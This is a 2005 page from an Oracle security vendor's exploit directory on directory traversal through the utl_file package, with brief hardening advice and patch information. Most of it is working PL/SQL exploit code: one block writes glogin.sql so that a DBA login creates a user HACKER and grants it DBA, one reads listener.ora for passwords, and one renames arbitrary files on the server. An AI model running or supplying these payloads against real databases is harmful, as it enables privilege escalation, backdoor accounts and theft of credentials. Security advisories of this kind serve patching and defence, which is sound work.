|
Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Oracle Exploit Directory Traversal via utl_file
Details By using directory traversal it is possible to read, write or rename files on the database server. With this technique it is possible to become DBA (via glogin.sql /login.sql), to read passwords (e.g. mod_plsql, listener.ora), ... . In older database versions it is also possible to use the "..\" syntax. Keep in mind NEVER to set the init.ora parameter "utl_file_dir=*" or to grant the privilege "CREATE ANY DIRECTORY" to PUBLIC. Example --Create a file mytextfile.txt in the same directory referenced by MEDIA_DIR directory object. declare f utl_file.file_type; begin f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\glogin.sql','w',1000); UTL_FILE.PUT_LINE (f,'CREATE USER HACKER IDENTIFIED BY HACKER;',TRUE); UTL_FILE.PUT_LINE (f,'GRANT DBA TO HACKER;',TRUE); UTL_FILE.FCLOSE(f); end; --Read arbitrary files in the same drive as the directory referenced by MEDIA_DIR directory object. SET SERVEROUTPUT ON declare f utl_file.file_type; sBuffer Varchar(8000); begin f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\oracle\ora92\network\ADMIN\listener.ora','r'); loop UTL_FILE.GET_LINE (f,sBuffer); DBMS_OUTPUT.PUT_LINE(sBuffer); end loop; EXCEPTION when no_data_found then UTL_FILE.FCLOSE(f); end; --Rename any file in the same drive as the directory referenced by MEDIA_DIR directory object begin UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\myoldtextfile.txt','MEDIA_DIR','\\.\\..\\.\\..\\.\\mynewtextfile.txt',TRUE); end; Patch Information Apply the latest patchsets for Oracle alert 68 or later. © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |